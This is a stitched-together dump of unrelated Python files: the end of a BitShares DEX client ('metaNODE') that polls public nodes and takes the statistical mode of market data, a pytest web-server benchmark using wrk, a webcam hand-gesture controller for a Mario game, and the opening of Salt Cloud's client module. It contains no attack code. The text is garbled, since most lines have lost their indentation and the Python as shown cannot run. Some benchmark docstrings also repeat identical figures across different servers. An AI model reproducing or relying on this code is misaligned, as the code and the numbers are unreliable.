balances = {}
for j in range(len(asset_ids)):
balances[asset_ids[j]] = 0
for j in range(len(asset_ids)):
for k in range(len(ret)):
if ret[k]['asset_id'] == asset_ids[j]:
balances[asset_ids[j]] += float(
ret[k]['amount'])/10**asset_precisions[j]
return balances
def dex_open_orders(ws, asset, asset_id, asset_precision,
currency, currency_id, currency_precision):
get_full_accounts = Z + \
'"get_full_accounts",[["%s",],%s]]}' % (
account_name, 'false')
        # a database call to the api returns the price as a fraction
        # with unreferenced decimal point locations on both amounts,
        # and assets are referenced by A.B.C ids instead of ticker symbols
time.sleep(BLIP)
ws.send(get_full_accounts)
ret = ws.recv()
BitPAIR = asset + ":" + currency
        print(BitPAIR)
try:
limit_orders = json.loads(ret)['result'][0][1]['limit_orders']
except:
limit_orders = []
orders = []
for order in limit_orders:
orderNumber = order['id']
base_id = order['sell_price']['base']['asset_id']
quote_id = order['sell_price']['quote']['asset_id']
if ((base_id in [currency_id, asset_id]) and
(quote_id in [currency_id, asset_id])):
amount = float(order['for_sale'])
base_amount = float(order['sell_price']['base']['amount'])
quote_amount = float(order['sell_price']['quote']['amount'])
if base_id == currency_id:
base_precision = currency_precision
quote_precision = asset_precision
else:
base_precision = asset_precision
quote_precision = currency_precision
base_amount /= 10**base_precision
quote_amount /= 10**quote_precision
if base_id == asset_id:
orderType = 'sell'
price = quote_amount / base_amount
amount = (amount/10**base_precision)
else:
orderType = 'buy'
price = base_amount / quote_amount
amount = (amount/10**base_precision)/price
orders.append({'orderNumber': orderNumber,
'orderType': orderType,
'market': BitPAIR,
'amount': precision(amount, asset_precision),
'price': precision(price, 16)})
return sorted(orders, key=lambda k: k['price'])
def dex_book(ws, currency, asset, depth=3):
get_order_book = Z + \
'"get_order_book",["%s","%s","%s"]]}' % (
currency, asset, depth)
time.sleep(BLIP)
ws.send(get_order_book)
order_book = json.loads(ws.recv())['result']
askp = []
bidp = []
askv = []
bidv = []
for i in range(len(order_book['asks'])):
price = precision(order_book['asks'][i]['price'], 16)
if float(price) == 0:
raise ValueError('zero price in asks')
volume = precision(
order_book['asks'][i]['quote'], asset_precision)
askp.append(price)
askv.append(volume)
for i in range(len(order_book['bids'])):
price = precision(order_book['bids'][i]['price'], 16)
if float(price) == 0:
raise ValueError('zero price in bids')
volume = precision(
order_book['bids'][i]['quote'], asset_precision)
bidp.append(price)
bidv.append(volume)
if float(bidp[0]) >= float(askp[0]):
raise ValueError('mismatched orderbook')
return askp, bidp, askv, bidv
# THRESHING EVENT LOOP
while True:
try:
ws = 0
time.sleep(random())
# CHECK BLACK AND WHITE LISTS
black = race_read(doc='blacklist.txt')
white = race_read(doc='whitelist.txt')
shuffle(nodes)
node = nodes[0]
if node in black:
raise ValueError('blacklisted')
if node in white:
raise ValueError('whitelisted')
# connect to websocket
handshake_latency, ws = dex_handshake(node)
# use node a dozen times
for i in range(12):
time.sleep(PAUSE)
# Database calls
ping_latency = dex_ping_latency(ws)
block_latency, blocktime = dex_block_latency(ws)
last = dex_last(ws, currency, asset)
now = to_iso_date(time.time())
then = to_iso_date(time.time() - 3 * 86400)
history = dex_market_history(ws, currency, asset, now, then)
askp, bidp, askv, bidv = dex_book(ws, currency, asset, depth=3)
balances = dex_account_balances(ws, account_name,
asset_ids=[asset_id, currency_id],
asset_precisions=[asset_precision, currency_precision])
bts_balance = balances['1.3.0']
asset_balance = balances[asset_id]
currency_balance = balances[currency_id]
orders = dex_open_orders(ws, asset, asset_id, asset_precision,
currency, currency_id, currency_precision)
try:
import psutil # REQUIRES MODULE INSTALL
proc = psutil.Process()
descriptors = proc.num_fds()
cpu = '%.3f' % (float(os.popen('''grep 'cpu ' /proc/stat | awk '{usage=($2+$4)*100/($2+$4+$5)} END {print usage }' ''').readline()))
ram = '%.3f' % (100*float(proc.memory_percent()))
io = list(proc.io_counters())[:2]
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
watchdog_latency = watchdog()
runtime = int(time.time()) - BEGIN
# in the event data passes all tests, then:
# print, winnow the node, and nascent trend the maven
print_market()
if (len(white) < WHITE) or (len(black) < BLACK):
alert = ' * building lists *'
else:
alert = ''
print('runtime ', runtime)
print('epoch ', epoch, 'pid', pid)
print('fds, processes ', descriptors, process, 'of', PROCESSES)
try:
print('cpu ram ', cpu , ram)
except:
pass
try:
print('read write ', io)
except:
pass
print('node ', node)
print('total:white:black', node_count, len(white), len(black), alert)
print('')
print('block latency ', ('%.3f' % block_latency))
print('handshake ', ('%.3f' % handshake_latency))
print('ping ', ('%.3f' % ping_latency))
print('')
print('bitshares ', bts_balance, 'BTS')
print('currency ', currency_balance, currency)
print('assets ', asset_balance, asset)
print('')
print('last ', ('%.16f' % float(last)))
print('')
print('history depth ', len(history))
for i in range(3):
print(history[i])
print('')
print('asks depth ', len(askp))
for i in range(3):
print(askp[i], askv[i])
print('bids depth ', len(bidp))
for i in range(3):
print(bidp[i], bidv[i])
print('')
print('open orders ', len(orders))
for order in orders:
print(order)
print('')
print('watchdog latency:', watchdog_latency)
print('')
# winnow whitelist the node and nascent trend the maven
maven = {}
maven['bidv'] = bidv
maven['askv'] = askv
maven['bidp'] = bidp
maven['askp'] = askp
maven['bts_balance'] = bts_balance
maven['currency_balance'] = currency_balance
maven['asset_balance'] = asset_balance
maven['market_history'] = history
maven['orders'] = orders
maven['last'] = last
maven['whitelist'] = white
maven['blacklist'] = black
maven['blocktime'] = blocktime
nascent_trend(maven)
winnow('whitelist', node)
try:
time.sleep(BLIP)
ws.close()
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
pass
continue
except Exception as e:
try:
time.sleep(BLIP)
ws.close()
except:
pass
msg = str(type(e).__name__) + str(e.args) + node
if (('ValueError' not in msg) and
('StatisticsError' not in msg) and
('result' not in msg) and
('timeout' not in msg) and
('SSL' not in msg) and
('WebSocketTimeoutException' not in msg) and
('WebSocketBadStatusException' not in msg) and
('WebSocketAddressException' not in msg) and
('ConnectionResetError' not in msg) and
('ConnectionRefusedError' not in msg)) :
msg += '\n'+ str(traceback.format_exc())
print(msg)
if 'listed' not in msg:
race_append(doc='metaNODElog.txt', text=msg)
winnow('blacklist', node)
continue
def winnow(x, node): # separate good nodes from bad
if x == 'blacklist':
black = race_read(doc='blacklist.txt')
if isinstance(black, list):
if node in black:
black.remove(node)
black.append(node)
black = black[-BLACK:]
race_write(doc='blacklist.txt', text=black)
else:
race_write(doc='blacklist.txt', text=[node])
if x == 'whitelist':
white = race_read(doc='whitelist.txt')
if isinstance(white, list):
if node in white:
white.remove(node)
white.append(node)
white = white[-WHITE:]
race_write(doc='whitelist.txt', text=white)
else:
race_write(doc='whitelist.txt', text=[node])
def nascent_trend(maven): # append latest data
mavens = race_read(doc='mavens.txt')
if isinstance(mavens, list):
mavens.append(str(maven))
mavens = mavens[-MAVENS:]
race_write(doc='mavens.txt', text=mavens)
else:
race_write(doc='mavens.txt', text=[str(maven)])
def bifurcation(): # statistically curate data
while True:
try:
time.sleep(1)
mavens = race_read(doc='mavens.txt')
l = len(mavens)
# initialize lists to sort data from each maven by key
bidp = []
askp = []
bidv = []
askv = []
bts_balance = []
currency_balance = []
asset_balance = []
history = []
last = []
whitelist = []
blacklist = []
blocktime = []
orders = []
# initialize the metaNODE dictionary
metaNODE = {}
# sort maven data for statistical analysis by key
for i in range(len(mavens)):
maven = literal(mavens[i])
bts_balance.append(maven['bts_balance'])
currency_balance.append(maven['currency_balance'])
asset_balance.append(maven['asset_balance'])
last.append(maven['last'])
blocktime.append(maven['blocktime'])
whitelist.append(maven['whitelist'])
blacklist.append(maven['blacklist'])
# stringify lists for statistical mode
bidp.append(str(maven['bidp']))
askp.append(str(maven['askp']))
bidv.append(str(maven['bidv']))
askv.append(str(maven['askv']))
history.append(str(maven['market_history']))
orders.append(str(maven['orders']))
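                # (lists are cast to str here because statistics.mode needs
                #  hashable values; the winning string is literal()'d back
                #  into a list further down)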
# find the oldest bitshares blocktime in our dataset
blocktime = min(blocktime)
# get the mode of the mavens for each metric
# allow 1 or 2 less than total & most recent for mode
# accept "no mode" statistics error as possibility
try:
bts_balance = mode(bts_balance)
except:
try:
bts_balance = mode(bts_balance[-(l-1):])
except:
bts_balance = mode(bts_balance[-(l-2):])
try:
currency_balance = mode(currency_balance)
except:
try:
currency_balance = mode(currency_balance[-(l-1):])
except:
currency_balance = mode(currency_balance[-(l-2):])
try:
asset_balance = mode(asset_balance)
except:
try:
asset_balance = mode(asset_balance[-(l-1):])
except:
asset_balance = mode(asset_balance[-(l-2):])
try:
last = mode(last)
except:
try:
last = mode(last[-(l-1):])
except:
last = mode(last[-(l-2):])
try:
bidp = literal(mode(bidp))
except:
try:
bidp = literal(mode(bidp[-(l-1):]))
except:
bidp = literal(mode(bidp[-(l-2):]))
try:
askp = literal(mode(askp))
except:
try:
askp = literal(mode(askp[-(l-1):]))
except:
askp = literal(mode(askp[-(l-2):]))
try:
bidv = literal(mode(bidv))
except:
try:
bidv = literal(mode(bidv[-(l-1):]))
except:
bidv = literal(mode(bidv[-(l-2):]))
try:
askv = literal(mode(askv))
except:
try:
askv = literal(mode(askv[-(l-1):]))
except:
askv = literal(mode(askv[-(l-2):]))
try:
history = literal(mode(history))
except:
try:
history = literal(mode(history[-(l-1):]))
except:
history = literal(mode(history[-(l-2):]))
try:
orders = literal(mode(orders))
except:
try:
orders = literal(mode(orders[-(l-1):]))
except:
orders = literal(mode(orders[-(l-2):]))
# attempt a full whitelist and blacklist
wl = []
for i in whitelist:
wl += i
whitelist = list(set(wl))[-WHITE:]
bl = []
for i in blacklist:
bl += i
blacklist = list(set(bl))[-BLACK:]
# rebuild orderbook as 4 key dict with lists of floats
bidp = [float(i) for i in bidp]
bidv = [float(i) for i in bidv]
askp = [float(i) for i in askp]
askv = [float(i) for i in askv]
book = {'bidp':bidp, 'bidv':bidv, 'askp':askp, 'askv':askv}
# if you made it this far without statistics error
# truncate and rewrite the metaNODE with curated data
metaNODE['book'] = book
metaNODE['bts_balance'] = float(bts_balance)
metaNODE['currency_balance'] = float(currency_balance)
metaNODE['asset_balance'] = float(asset_balance)
metaNODE['history'] = history #LIST
metaNODE['orders'] = orders #LIST
metaNODE['last'] = float(last)
metaNODE['whitelist'] = whitelist #LIST
metaNODE['blacklist'] = blacklist #LIST
metaNODE['blocktime'] = float(blocktime)
metaNODE['account_name'] = account_name #STRING
metaNODE['account_id'] = account_id #STRING A.B.C
metaNODE['asset'] = asset #STRING SYMBOL
metaNODE['asset_id'] = asset_id #STRING A.B.C
metaNODE['asset_precision'] = int(asset_precision)
metaNODE['currency'] = currency #STRING SYMBOL
metaNODE['currency_id'] = currency_id #STRING A.B.C
metaNODE['currency_precision'] = int(currency_precision)
# solitary process with write access to metaNODE.txt
race_write(doc='metaNODE.txt', text=metaNODE)
            print('metaNODE.txt updated')
except Exception as e: # wait a second and try again
# common msg is "no mode statistics error"
msg = str(type(e).__name__) + str(e.args)
print(msg)
race_append(doc='metaNODElog.txt', text=msg)
continue # from top of while loop NOT pass through error
# HELPER FUNCTIONS
# ======================================================================
def bell(duration=2, frequency=432): # Activate linux audible bell
pass
'''
os.system('play --no-show-progress --null --channels 1 synth' +
' %s sine %f' % (duration*1000, frequency))
'''
def gmail():
pass
'''
send_to = "THE EMAIL ADDRESS TO SEND TO"
send_from = "YOUR EMAIL ADDRESS"
pass = "YOUR PASSWORD"
msg = "YOUR MESSAGE!"
import smtplib
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
    server.login(send_from, password)
server.sendmail(send_from, send_to, msg)
server.quit()
'''
def to_iso_date(unix): # returns iso8601 datetime given unix epoch
return datetime.utcfromtimestamp(int(unix)).isoformat()
def from_iso_date(date): # returns unix epoch given iso8601 datetime
return int(time.mktime(time.strptime(str(date),
'%Y-%m-%dT%H:%M:%S')))
def precision(x, n): # string representation of float to n decimal places
return ('%.' + str(n) + 'f') % float(x)
def print_market(): # terminal header with cached values
print("\033c")
logo()
print('')
print(time.ctime())
print('=======================================')
print('account ', account_name, account_id)
print('currency ', currency, currency_id, currency_precision)
print('asset ', asset, asset_id, asset_precision)
print('=======================================')
print('')
def welcome():
version()
print("\033c")
logo()
banner()
time.sleep(3)
for i in range(5):
print("\033c")
logo()
time.sleep(0.5)
def logo():
def wxyz():
a = 'abcdef1234567890'
b = ''
for i in range(17):
b = str(b + r'\x' + choice(a) + choice(a))
return b
w,x,y,z = wxyz(),wxyz(),wxyz(),wxyz()
print(w)
print(x)
print(
''' ____ _____ ___ ______ ________
Bitshares Trustless Client (_ \(_ _).' `.(_ _ `.(_ __ \
__ __ ____ ____ __ | \ | | / .-. \ | | `. \ | |_ \_|
( \/ )( ___)(_ _) / \ | |\ \| | | | | | | | | | | _) _
) ( | __) || / <> \ _| |_\ |_\ `-' /_| |_.' /_| |__/ |
(_/\/\_)(____) (__)(__)(__)(_____|\____)`.___.'(______.'(________/
''' + version)
print(y)
print(z)
def version():
global VERSION, version
version = 'v0.00000011'
VERSION = 'metaNODE ' + version + ' - Bitshares Trustless Client'
    sys.stdout.write('\x1b]2;' + VERSION + '\x07') # set the terminal title
def main(): # script primary backbone
controls()
welcome()
initialize()
public_nodes()
constants()
sign_in()
cache()
spawn()
if __name__ == "__main__":
main()
|
bench_apps.py
|
"""
Benchmark different servers
"""
import os
import time
import pytest
import requests
import subprocess
from functools import wraps
from multiprocessing import Process
from pytest_cov.embed import cleanup_on_sigterm
from web.core.http import Handler
cleanup_on_sigterm()
BASE = os.path.dirname(__file__)
HELLO_WORLD = 'Hello World!'
with open(os.path.join(BASE, 'templates', 'landing.html'), 'r') as f:
LANDING_PAGE = f.read()
STATIC_PATH = os.path.join(BASE, '..', 'docs')
with open(os.path.join(STATIC_PATH, 'data-binding.gif'), 'rb') as f:
STATIC_FILE = f.read()
# Expected responses
RESPONSES = {
'/': HELLO_WORLD,
'/landing': LANDING_PAGE,
'/static/data-binding.gif': STATIC_FILE
}
def aiohttp_app(port):
""" Without logging...
Running 30s test @ http://127.0.0.1:8888/
12 threads and 400 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 89.37ms 6.68ms 290.76ms 89.18%
Req/Sec 369.61 80.32 666.00 83.37%
132444 requests in 30.04s, 20.59MB read
Requests/sec: 4408.86
Transfer/sec: 701.81KB
"""
from web.apps.aiohttp_app import AiohttpApplication
class Home(Handler):
async def get(self, request, response):
response.body = HELLO_WORLD
return response
class Landing(Handler):
async def get(self, request, response):
response.body = LANDING_PAGE
return response
app = AiohttpApplication()
app.add_route('/', Home())
app.add_route('/landing', Landing())
app.add_static_route('/static/', STATIC_PATH)
app.timed_call(31000, app.stop)
app.start(port=port)
def sanic_app(port):
""" With logging
Running 30s test @ http://127.0.0.1:8888/
12 threads and 400 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 62.65ms 10.04ms 189.96ms 87.87%
Req/Sec 526.93 159.98 1.00k 64.25%
188860 requests in 30.06s, 23.41MB read
Requests/sec: 6283.35
Transfer/sec: 797.69KB
"""
from web.apps.sanic_app import SanicApplication
from sanic import Sanic, response
app = SanicApplication()
class Home(Handler):
async def get(self, request, response):
response.body = HELLO_WORLD.encode()
return response
class Landing(Handler):
async def get(self, request, response):
response.body = LANDING_PAGE.encode()
return response
app.add_route('/', Home())
app.add_route('/landing', Landing())
app.add_static_route('/static', STATIC_PATH)
app.timed_call(31000, app.stop)
app.start(port=port)
def falcon_app(port):
""" With logging
Running 30s test @ http://127.0.0.1:8888/
12 threads and 400 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 62.65ms 10.04ms 189.96ms 87.87%
Req/Sec 526.93 159.98 1.00k 64.25%
188860 requests in 30.06s, 23.41MB read
Requests/sec: 6283.35
Transfer/sec: 797.69KB
"""
from web.apps.falcon_app import FalconApplication
app = FalconApplication()
class Home(Handler):
def get(self, req, resp):
resp.body = HELLO_WORLD
class Landing(Handler):
def get(self, req, resp):
resp.body = LANDING_PAGE
app.add_route('/', Home())
app.add_route('/landing', Landing())
app.add_static_route('/static', STATIC_PATH)
#app.timed_call(31000, app.stop) # Does not work
app.start(port=port)
def flask_app(port):
""" With logging
Running 30s test @ http://127.0.0.1:8888/
12 threads and 400 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 62.65ms 10.04ms 189.96ms 87.87%
Req/Sec 526.93 159.98 1.00k 64.25%
188860 requests in 30.06s, 23.41MB read
Requests/sec: 6283.35
Transfer/sec: 797.69KB
"""
from web.apps.flask_app import FlaskApplication
from flask import Flask
app = FlaskApplication()
def home():
return HELLO_WORLD
def landing():
return LANDING_PAGE
app.add_route('/', home)
app.add_route('/landing', landing)
app.add_static_route('/static', STATIC_PATH)
app.timed_call(31000, app.stop)
app.start(port=port)
def tornado_app(port):
""" Even without logging it's slower!
Running 30s test @ http://127.0.0.1:8888/
12 threads and 400 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 179.14ms 26.19ms 464.63ms 92.60%
Req/Sec 184.55 107.47 560.00 57.59%
64871 requests in 30.10s, 12.87MB read
Requests/sec: 2155.42
Transfer/sec: 437.82KB
with logging
Running 30s test @ http://127.0.0.1:8888/
12 threads and 400 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 209.77ms 28.48ms 320.47ms 91.43%
Req/Sec 156.14 79.60 500.00 63.72%
55415 requests in 30.10s, 10.99MB read
Requests/sec: 1841.04
Transfer/sec: 373.96KB
"""
import tornado.web
from web.apps.tornado_app import TornadoApplication
from tornado.log import enable_pretty_logging
enable_pretty_logging()
app = TornadoApplication()
class Home(Handler):
def get(self, req, resp):
resp.write(HELLO_WORLD)
resp.finish()
class Landing(Handler):
def get(self, req, resp):
resp.write(LANDING_PAGE)
resp.finish()
app.add_route('/', Home())
app.add_route('/landing', Landing())
app.add_static_route('/static', STATIC_PATH)
app.timed_call(31000, app.stop)
app.start(port=port)
def twisted_app(port):
""" With logging
Running 30s test @ http://127.0.0.1:8888/
12 threads and 400 connections
Thread Stats Avg Stdev Max +/- Stdev
Latency 124.17ms 24.74ms 492.40ms 85.64%
Req/Sec 245.94 80.01 0.86k 66.42%
87585 requests in 30.05s, 11.78MB read
Requests/sec: 2914.22
Transfer/sec: 401.27KB
"""
from twisted.web import server
from twisted.web.resource import Resource
from twisted.web.static import File
from web.apps.twisted_app import TwistedApplication
class Main(Resource):
def getChild(self, name, request):
name = name.decode()
if name == '':
return self
return self.children[name]
def render_GET(self, request):
return HELLO_WORLD.encode()
class Landing(Resource):
isLeaf = True
def render_GET(self, request):
return LANDING_PAGE.encode()
root = Main()
root.putChild('landing', Landing())
root.putChild('static', File(STATIC_PATH))
site = server.Site(root)
app = TwistedApplication(port=port, site=site)
app.timed_call(31000, app.stop)
app.start()
def vibora_app(port):
""" With logging
"""
from web.apps.vibora_app import ViboraApplication
from vibora import Request, Response
app = ViboraApplication()
class AsyncHandler(Handler):
async def __call__(self, request: Request) -> Response:
return super().__call__(request)
class Home(AsyncHandler):
async def get(self, request, response):
return Response(HELLO_WORLD.encode())
class Landing(AsyncHandler):
async def get(self, request, response):
return Response(LANDING_PAGE.encode())
app.add_static_route('/static', STATIC_PATH)
app.add_route('/', Home())
app.add_route('/landing', Landing())
app.timed_call(31000, app.stop)
app.start(port=port)
def clip(s, n=100):
if len(s) <= n:
return s
return s[:n]
@pytest.mark.parametrize('server, route', [
(server, route)
for server in (
#aiohttp_app,
#sanic_app, # Sanic is a memory hog and keeps killing my laptop
#falcon_app,
#tornado_app,
#twisted_app,
vibora_app,
)
for route in RESPONSES.keys()
])
def test_benchmarks(capsys, server, route):
port = 8888
url = 'http://127.0.0.1:{}{}'.format(port, route)
benchmark = 'wrk -t12 -c400 -d30s {}'.format(url)
p = Process(target=server, args=(port,))
p.start()
try:
time.sleep(1)
# Make sure the page is actually what we expect
r = requests.get(url)
if not r.ok:
with capsys.disabled():
print(clip(r.content, 100))
assert r.ok
if 'static' in route:
assert r.content == RESPONSES[route]
else:
assert r.content.decode() == RESPONSES[route]
# Run wrk
results = subprocess.check_output(benchmark.split())
with capsys.disabled():
print("\n---------------------")
for line in results.split(b"\n"):
print(line.decode())
print("---------------------")
finally:
p.join(5)
if p.is_alive():
p.terminate()
p.join(1)
time.sleep(2)
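# Illustrative sketch, not part of the original test module: the wrk output
# printed above can be reduced to its headline throughput number. The helper
# name is hypothetical; it only assumes the "Requests/sec: <number>" line
# shown in the docstrings of the app functions.
def parse_requests_per_sec(wrk_output):
    """Extract the Requests/sec figure from raw wrk output (bytes)."""
    for line in wrk_output.split(b"\n"):
        if line.startswith(b"Requests/sec:"):
            return float(line.split(b":", 1)[1].decode().strip())
    raise ValueError("No 'Requests/sec' line found in wrk output")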
if __name__ == '__main__':
vibora_app(8888)
|
mario.py
|
import tensorflow as tf
import cv2
import multiprocessing as _mp
from src.utils import load_graph, mario, detect_hands, predict
from src.config import ORANGE, RED, GREEN
tf.flags.DEFINE_integer("width", 640, "Screen width")
tf.flags.DEFINE_integer("height", 480, "Screen height")
tf.flags.DEFINE_float("threshold", 0.6, "Threshold for score")
tf.flags.DEFINE_float("alpha", 0.3, "Transparent level")
tf.flags.DEFINE_string("pre_trained_model_path", "src/pretrained_model.pb", "Path to pre-trained model")
FLAGS = tf.flags.FLAGS
def main():
graph, sess = load_graph(FLAGS.pre_trained_model_path)
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, FLAGS.width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, FLAGS.height)
mp = _mp.get_context("spawn")
v = mp.Value('i', 0)
lock = mp.Lock()
process = mp.Process(target=mario, args=(v, lock))
process.start()
while True:
key = cv2.waitKey(10)
if key == ord("q"):
break
_, frame = cap.read()
frame = cv2.flip(frame, 1)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
boxes, scores, classes = detect_hands(frame, graph, sess)
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
results = predict(boxes, scores, classes, FLAGS.threshold, FLAGS.width, FLAGS.height)
if len(results) == 1:
x_min, x_max, y_min, y_max, category = results[0]
x = int((x_min + x_max) / 2)
y = int((y_min + y_max) / 2)
cv2.circle(frame, (x, y), 5, RED, -1)
if category == "Open" and x <= FLAGS.width / 3:
action = 7 # Left jump
text = "Jump left"
elif category == "Closed" and x <= FLAGS.width / 3:
action = 6 # Left
text = "Run left"
elif category == "Open" and FLAGS.width / 3 < x <= 2 * FLAGS.width / 3:
action = 5 # Jump
text = "Jump"
elif category == "Closed" and FLAGS.width / 3 < x <= 2 * FLAGS.width / 3:
action = 0 # Do nothing
text = "Stay"
elif category == "Open" and x > 2 * FLAGS.width / 3:
action = 2 # Right jump
text = "Jump right"
elif category == "Closed" and x > 2 * FLAGS.width / 3:
action = 1 # Right
text = "Run right"
else:
action = 0
text = "Stay"
with lock:
v.value = action
cv2.putText(frame, "{}".format(text), (x_min, y_min - 5),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, GREEN, 2)
overlay = frame.copy()
cv2.rectangle(overlay, (0, 0), (int(FLAGS.width / 3), FLAGS.height), ORANGE, -1)
cv2.rectangle(overlay, (int(2 * FLAGS.width / 3), 0), (FLAGS.width, FLAGS.height), ORANGE, -1)
cv2.addWeighted(overlay, FLAGS.alpha, frame, 1 - FLAGS.alpha, 0, frame)
cv2.imshow('Detection', frame)
cap.release()
cv2.destroyAllWindows()
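# Illustrative sketch, not part of the original script: the gesture-to-action
# mapping from the if/elif chain in main(), rewritten as a lookup table.
# Zone boundaries and action codes mirror the original; the helper name and
# table are otherwise hypothetical.
GESTURE_ACTIONS = {
    ("Open", "left"): (7, "Jump left"),
    ("Closed", "left"): (6, "Run left"),
    ("Open", "middle"): (5, "Jump"),
    ("Closed", "middle"): (0, "Stay"),
    ("Open", "right"): (2, "Jump right"),
    ("Closed", "right"): (1, "Run right"),
}

def gesture_to_action(category, x, width):
    """Map a detected hand (category, horizontal position) to (action, label)."""
    if x <= width / 3:
        zone = "left"
    elif x <= 2 * width / 3:
        zone = "middle"
    else:
        zone = "right"
    return GESTURE_ACTIONS.get((category, zone), (0, "Stay"))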
if __name__ == '__main__':
main()
|
__init__.py
|
"""
The top level interface used to translate configuration data back to the
correct cloud modules
"""
import copy
import glob
import logging
import multiprocessing
import os
import signal
import sys
import time
import traceback
from itertools import groupby
import salt.client
import salt.config
import salt.loader
import salt.syspaths
import salt.utils.args
import salt.utils.cloud
import salt.utils.context
import salt.utils.crypt
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.files
import salt.utils.user
import salt.utils.verify
import salt.utils.yaml
from salt.exceptions import (
SaltCloudConfigError,
SaltCloudException,
SaltCloudNotFound,
SaltCloudSystemExit,
)
from salt.template import compile_template
try:
import Cryptodome.Random
except ImportError:
try:
import Crypto.Random
except ImportError:
pass # pycrypto < 2.1
log = logging.getLogger(__name__)
def communicator(func):
"""Warning, this is a picklable decorator !"""
def _call(queue, args, kwargs):
"""called with [queue, args, kwargs] as first optional arg"""
kwargs["queue"] = queue
ret = None
try:
ret = func(*args, **kwargs)
queue.put("END")
except KeyboardInterrupt as ex:
trace = traceback.format_exc()
queue.put("KEYBOARDINT")
queue.put("Keyboard interrupt")
queue.put("{}\n{}\n".format(ex, trace))
except Exception as ex: # pylint: disable=broad-except
trace = traceback.format_exc()
queue.put("ERROR")
queue.put("Exception")
queue.put("{}\n{}\n".format(ex, trace))
except SystemExit as ex:
trace = traceback.format_exc()
queue.put("ERROR")
queue.put("System exit")
queue.put("{}\n{}\n".format(ex, trace))
return ret
return _call
def enter_mainloop(
target,
mapped_args=None,
args=None,
kwargs=None,
pool=None,
pool_size=None,
callback=None,
queue=None,
):
"""
Manage a multiprocessing pool
- If the queue does not output anything, the pool runs indefinitely
- If the queue returns KEYBOARDINT or ERROR, the pool is terminated and
joined, and a SaltCloudSystemExit exception is raised to notify callers
of the abnormal termination
- If the queue returns END, or a callback is defined and returns True,
the pool is simply joined and the data is returned.
target
the function you want to execute in multiprocessing
pool
pool object; can be None if you want a default pool, but you will
then have to define pool_size instead
pool_size
pool size if you did not provide a pool yourself
callback
a callable taking a string argument and returning True to
signal that 'target' is finished and the pool should be
joined
queue
A custom multiprocessing queue in case you want to do
extra stuff and need it later in your program
args
positional arguments to call the function with
if you don't want to use pool.map
mapped_args
a list of one or more arguments combinations to call the function with
e.g. (foo, [[1], [2]]) will call::
foo([1])
foo([2])
kwargs
keyword arguments to pass to the function when run in a process
Attention, the function must have the following signature:
target(queue, *args, **kw)
You may use the 'communicator' decorator defined above to generate
such a function
"""
if not kwargs:
kwargs = {}
if not pool_size:
pool_size = 1
if not pool:
pool = multiprocessing.Pool(pool_size)
if not queue:
manager = multiprocessing.Manager()
queue = manager.Queue()
if mapped_args is not None and not mapped_args:
msg = (
"We are called to asynchronously execute {}"
" but we do not have anything to execute;"
" bailing out".format(target)
)
log.error(msg)
raise SaltCloudSystemExit("Exception caught\n{}".format(msg))
elif mapped_args is not None:
iterable = [[queue, [arg], kwargs] for arg in mapped_args]
ret = pool.map(func=target, iterable=iterable)
else:
ret = pool.apply(target, [queue, args, kwargs])
while True:
test = queue.get()
if test in ["ERROR", "KEYBOARDINT"]:
type_ = queue.get()
trace = queue.get()
msg = "Caught {}, terminating workers\n".format(type_)
msg += "TRACE: {}\n".format(trace)
log.error(msg)
pool.terminate()
pool.join()
raise SaltCloudSystemExit("Exception caught\n{}".format(msg))
elif test in ["END"] or (callback and callback(test)):
pool.close()
pool.join()
break
else:
time.sleep(0.125)
return ret
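# Illustrative sketch, not part of the original module: how 'communicator'
# and 'enter_mainloop' are meant to fit together. The decorated wrapper is
# invoked by the pool as wrapper(queue, args, kwargs); it passes the queue
# to the wrapped function as a keyword argument and pushes the "END" /
# "ERROR" / "KEYBOARDINT" sentinels that enter_mainloop polls for.
# '_example_task' is hypothetical.
#
#     @communicator
#     def _example_task(name, queue=None):
#         return "created {}".format(name)
#
#     # Runs the task on a one-worker pool and returns its result once the
#     # "END" sentinel is seen on the shared queue.
#     result = enter_mainloop(_example_task, args=["node1"], pool_size=1)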
class CloudClient:
"""
The client class to wrap cloud interactions
"""
def __init__(self, path=None, opts=None, config_dir=None, pillars=None):
if opts:
self.opts = opts
else:
self.opts = salt.config.cloud_config(path)
# Check the cache-dir exists. If not, create it.
v_dirs = [self.opts["cachedir"]]
salt.utils.verify.verify_env(v_dirs, salt.utils.user.get_user())
if pillars:
for name, provider in pillars.pop("providers", {}).items():
driver = provider["driver"]
provider["profiles"] = {}
self.opts["providers"].update({name: {driver: provider}})
for name, profile in pillars.pop("profiles", {}).items():
provider = profile["provider"].split(":")[0]
driver = next(iter(self.opts["providers"][provider].keys()))
profile["provider"] = "{}:{}".format(provider, driver)
profile["profile"] = name
self.opts["profiles"].update({name: profile})
self.opts["providers"][provider][driver]["profiles"].update(
{name: profile}
)
for name, map_dct in pillars.pop("maps", {}).items():
if "maps" not in self.opts:
self.opts["maps"] = {}
self.opts["maps"][name] = map_dct
self.opts.update(pillars)
def _opts_defaults(self, **kwargs):
"""
Set the opts dict to defaults and allow for opts to be overridden in
the kwargs
"""
# Let's start with the default salt cloud configuration
opts = salt.config.DEFAULT_CLOUD_OPTS.copy()
# Update it with the loaded configuration
opts.update(self.opts.copy())
# Reset some of the settings to sane values
opts["parallel"] = False
opts["keep_tmp"] = False
opts["deploy"] = True
opts["update_bootstrap"] = False
opts["show_deploy_args"] = False
opts["script_args"] = ""
# Update it with the passed kwargs
if "kwargs" in kwargs:
opts.update(kwargs["kwargs"])
opts.update(kwargs)
profile = opts.get("profile", None)
# filter other profiles if one is specified
if profile:
tmp_profiles = opts.get("profiles", {}).copy()
for _profile in [a for a in tmp_profiles]:
if not _profile == profile:
tmp_profiles.pop(_profile)
# if profile is specified and we have enough info about providers
